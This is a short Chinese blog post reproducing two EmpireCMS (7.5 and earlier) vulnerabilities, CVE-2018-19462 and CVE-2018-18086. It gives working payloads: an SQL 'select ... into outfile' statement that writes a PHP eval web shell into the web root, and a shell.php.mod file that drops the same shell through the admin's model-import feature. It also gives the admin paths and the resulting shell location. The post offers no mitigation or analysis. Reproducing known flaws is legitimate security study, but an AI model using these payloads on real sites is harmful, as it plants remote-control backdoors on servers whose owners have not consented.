帝国CMS

1.漏洞复现

cve_2018_19462

影响范围：EmpireCMS <= 7.5

登录后台，路径：/e/admin/index.php

系统->备份与恢复数据->执行SQL语句

mysql.ini配置secure_file_priv=时可以写入PHP一句话木马

select '<?php @eval($_POST[1]);?>' into outfile 'D:/environment/phpstudy/PHPTutorial/WWW/shell.php';

cve_2018_18086 文件上传

影响范围：EmpireCMS <= 7.5

新建shell.php.mod

<?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>

登录后台，路径：/e/admin/index.php

系统->数据表与系统模型->管理数据表->导入系统模型->表名随意、文件选择shell.php.mod

PHP一句话木马路径：/e/admin/shell.php

posted @ 2023-01-16 20:18 Hacker&Cat 阅读(58) 评论(0) 编辑收藏举报

刷新页面返回顶部

Hacker&Cat